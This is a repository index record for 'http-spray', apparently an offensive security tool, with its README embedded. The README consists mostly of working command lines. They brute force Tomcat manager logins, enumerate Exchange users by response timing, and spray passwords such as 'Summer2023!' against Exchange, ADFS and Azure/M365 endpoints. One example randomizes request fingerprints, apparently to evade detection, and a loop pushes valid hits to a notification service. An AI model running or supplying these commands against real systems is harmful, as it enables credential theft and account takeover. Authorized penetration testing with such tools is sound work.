{"id":20812751,"url":"https://github.com/dadevel/http-spray","last_synced_at":"2026-06-29T07:31:03.191Z","repository":{"id":246184703,"uuid":"820349255","full_name":"dadevel/http-spray","owner":"dadevel","description":"Password Spraying and Brute Forcing over HTTP(S)","archived":false,"fork":false,"pushed_at":"2025-08-12T13:59:26.000Z","size":68,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-08-12T14:33:30.966Z","etag":null,"topics":["brute-force","http","password-spraying"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dadevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-06-26T09:42:33.000Z","updated_at":"2025-08-12T13:59:24.000Z","dependencies_parsed_at":"2025-01-18T14:54:11.703Z","dependency_job_id":"4c4599ac-2d62-4916-b20d-0093eeab963e","html_url":"https://github.com/dadevel/http-spray","commit_stats":null,"previous_names":["dadevel/http-spray"],"tags_count":6,"template":false,"template_full_name":null,"purl":"pkg:github/dadevel/http-spray","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dadevel","download_url":"https://codeload.github.com/dadevel/http-spray/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34918101,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-29T02:00:05.398Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","http","password-spraying"],"created_at":"2024-11-17T20:57:55.660Z","updated_at":"2026-06-29T07:31:03.184Z","avatar_url":"https://github.com/dadevel.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# http-spray\n\n## Setup\n\nInstall with [uv](https://github.com/astral-sh/uv/) or [pipx](https://github.com/pypa/pipx/).\n\n~~~ bash\nuv tool install git+https://github.com/dadevel/http-spray.git\npipx install git+https://github.com/dadevel/http-spray.git\n~~~\n\n## Usage\n\nBasic example: Brute force Tomcat manager login.\n\n~~~ bash\ncurl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt\nhttp-spray -t https://app.corp.com/tomcat/manager/html -m basic -c ./tomcat-credentials.txt | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\n### Exchange\n\nTime-based user enumeration against on-prem Exchange server.\nRequests for valid users take about 0.1s, invalid users take more than 1.5s.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m basic -u ./users.txt -p '' | tee -a ./http-spray.json | jq -c 'select(.time \u003c 0.5)'\n~~~\n\n\u003e [!note]\n\u003e The user enumeration requires basic authentication and seems to work only with the user formats `corp\\jdoe` and `corp.com\\jdoe` where `jdoe` is the *samaccountname*.\n\nPassword spraying against on-prem Exchange server.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m ntlm ./users.txt -p 'Summer2023#' | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\n\u003e [!note]\n\u003e The endpoint `/autodiscover/autodiscover.xml` returns status 200 for successful logins, but `/rpc/` returns 404 in this case.\n\u003e For additional endpoints see [here](https://github.com/dadevel/wordlists/raw/refs/heads/main/url-exchange.txt).\n\u003e\n\u003e Furthermore Exchange accepts the following username formats: `jdoe`, `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work for the OWA web login.\n\n### ADFS\n\nPassword spraying against ADFS trough NTLM authentication.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/services/trust/2005/windowstransport -m ntlm -u ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json\n~~~\n\nPassword spraying against ADFS trough OAuth2 password grant.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/oauth2/token -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -u ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json | jq -c 'select(.status_code == 200)'\n~~~\n\n\u003e [!note]\n\u003e ADFS accepts the following username formats: `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work as well.\n\n### Microsoft Cloud\n\nPassword spraying against Azure/M365 trough OAuth2 password grant.\n\n~~~ bash\nhttp-spray -t https://login.windows.net/corp.com/oauth2/token -m msauth --client-id 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --resource https://graph.windows.net -u ./users.txt -p 'Summer@2024' | tee -a ./http-spray.json\n~~~\n\nPassword spraying against Azure/M365 with full request randomization.\n\n~~~ bash\nhttp-spray -t https://login.microsoftonline.com/corp.com/oauth2/token -m msauth --user-agents ./wordlists/desktop-user-agents.csv --client-id ./wordlists/m365-public-clients.csv --resource ./wordlists/m365-resources.csv -u ./users.txt -p ./passwords.txt | tee -a ./http-spray.json\n~~~\n\n\u003e [!note]\n\u003e The username must be specified as email address, e.g. `john.doe@corp.com`.\n\n### Push Notifications\n\nIntegration for [pushover.net](https://pushover.net/).\n\n~~~ bash\ntail -f ./http-spray.json | jq -c 'select(.status!=\"invalid\" and .status!=\"exists\")|del(.user, .password)' | while read -r line; do\n    curl -sSf https://api.pushover.net/1/messages.json -d user=$PUSHOVER_USER -d token=$PUSHOVER_TOKEN --data-urlencode title='Password Spraying' --data-urlencode message=\"$line\"\ndone\n~~~\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdadevel%2Fhttp-spray","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray/lists"}